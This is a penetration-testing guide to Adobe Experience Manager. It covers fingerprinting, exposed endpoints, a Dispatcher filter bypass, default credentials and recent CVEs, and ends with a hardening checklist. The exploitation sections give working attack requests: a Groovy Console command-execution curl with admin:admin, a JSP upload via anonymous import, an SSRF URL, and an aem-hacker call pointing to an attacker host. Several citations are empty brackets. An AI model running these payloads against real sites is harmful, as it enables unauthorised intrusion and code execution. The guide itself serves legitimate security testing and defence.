# AEM (Adobe Experience Manager) Pentesting

{{#include ../../banners/hacktricks-training.md}}

> Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) is an enterprise CMS that runs on top of Apache Sling/Felix (OSGi) and a Java Content Repository (JCR).  
> From an attacker perspective AEM instances very often expose dangerous development endpoints, weak Dispatcher rules, default credentials and a long tail of CVEs that are patched every quarter.

The checklist below focuses on **externally reachable (unauth) attack surface** that keeps showing up in real engagements (2022-2025).

---

## 1. Fingerprinting

```
$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1            # header added by AEM Dispatcher
X-Vary: Accept-Encoding
```

Other quick indicators:
* `/etc.clientlibs/` static path present (returns JS/CSS).  
* `/libs/granite/core/content/login.html` login page with the “Adobe Experience Manager” banner.  
* `</script><!--/* CQ */-->` comment at the bottom of HTML.

---

## 2. High-value unauthenticated endpoints

Path | What you get | Notes
---- | ------------- | -----
`/.json`, `/.1.json` | JCR nodes via **DefaultGetServlet** | Often blocked, but *Dispatcher bypass* (see below) works.
`/bin/querybuilder.json?path=/` | QueryBuilder API | Leak of page tree, internal paths, user names.
`/system/console/status-*`, `/system/console/bundles` | OSGi/Felix console | 403 by default; if exposed & creds found ⇒ bundle-upload RCE.
`/crx/packmgr/index.jsp` | Package Manager | Allows authenticated content packages → JSP payload upload.
`/etc/groovyconsole/**` | AEM Groovy Console | If exposed → arbitrary Groovy / Java execution.
`/libs/cq/AuditlogSearchServlet.json` | Audit logs | Information disclosure.
`/libs/cq/ui/content/dumplibs.html` | ClientLibs dump | XSS vector.

### Dispatcher bypass trick
Most production sites sit behind the *Dispatcher* (reverse-proxy). Its filter rules can be bypassed by appending an allowed static extension **after a semicolon or encoded newline**:

```
GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
```
A single request like above frequently discloses user profile nodes with email addresses. P-T Partners published good guidance on this weakness. 【】

---

## 3. Common misconfigurations (still alive in 2025)

1. **Anonymous POST servlet** – `POST /.json` with `:operation=import` lets you plant new JCR nodes.  Blocking `*.json` POST in the Dispatcher fixes it. 【】
2. **World-readable user profiles** – default ACL grants `jcr:read` on `/home/users/**/profile/*` to everyone.
3. **Default credentials** – `admin:admin`, `author:author`, `replication:replication`.
4. **WCMDebugFilter** enabled ⇒ reflected XSS via `?debug=layout` (CVE-2016-7882, still found on legacy 6.4 installs).
5. **Groovy Console exposed** – remote code execution by sending a Groovy script:
   ```bash
   curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
   ```

---

## 4. Recent vulnerabilities (service-pack cadence)

Quarter | CVE | Affected | Impact
------- | --- | -------- | ------
Dec 2024 | **CVE-2024-43711** | 6.5.21 and earlier | Improper input validation → **Arbitrary code execution** (requires low-priv auth). 【】
Dec 2024 | CVE-2024-43724/26 | 6.5.21 and earlier | DOM / Stored XSS in Move Page Wizard. 【】
Dec 2023 | CVE-2023-48452/68 | ≤ 6.5.18 | DOM-based XSS via crafted URL. 【】
Dec 2022 | CVE-2022-30683 | ≤ 6.5.13 | Crypto design flaw → secret decryption (needs low-priv creds). 【】

Always check the *APSB* bulletin matching the customer’s service-pack and request the latest **6.5.22** or *Cloud Service 2024.11*.

---

## 5. Exploitation snippets

### 5.1 RCE via dispatcher bypass + JSP upload
If anonymous write is possible:
```
# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded

:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import
```
Now request `/content/evil.jsp` – the JSP runs with the AEM process user.

### 5.2 SSRF to RCE (historical < 6.3)
`/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console`  
`aem_ssrf2rce.py` from **aem-hacker** automates the full chain. 【】

---

## 6. Tooling

* **aem-hacker** – Swiss-army enumeration script, supports dispatcher bypass, SSRF detection, default-creds checks and more.  
  ```bash
  python3 aem_hacker.py -u https://target --host attacker-ip
  ```【】
* **Content Brute-force** – recursively request `/_jcr_content.(json|html)` to discover hidden components.
* **osgi-infect** – upload malicious OSGi bundle via `/system/console/bundles` if creds available.

---

## 7. Hardening checklist (for your report’s recommendations)

1. Keep instance on the **latest cumulative service pack** (as of Jul 2025: 6.5.22).  
2. Remove/rotate default accounts; enforce SSO/SAML.
3. Tighten **Dispatcher filters** – deny `;`, encoded newlines, and `*.json` or `*.querybuilder.json` for anonymous users.
4. Disable or protect consoles (`/system/console`, `/crx/*`, `/etc/groovyconsole`) with IP allow-lists.
5. Apply the *Anonymous Permission Hardening* package shipped by Adobe.



## References

* Adobe Security Bulletin APSB24-69 – “Security updates for Adobe Experience Manager (Dec 2024)”.
* 0ang3el – aem-hacker tool (GitHub).
{{#include ../../banners/hacktricks-training.md}}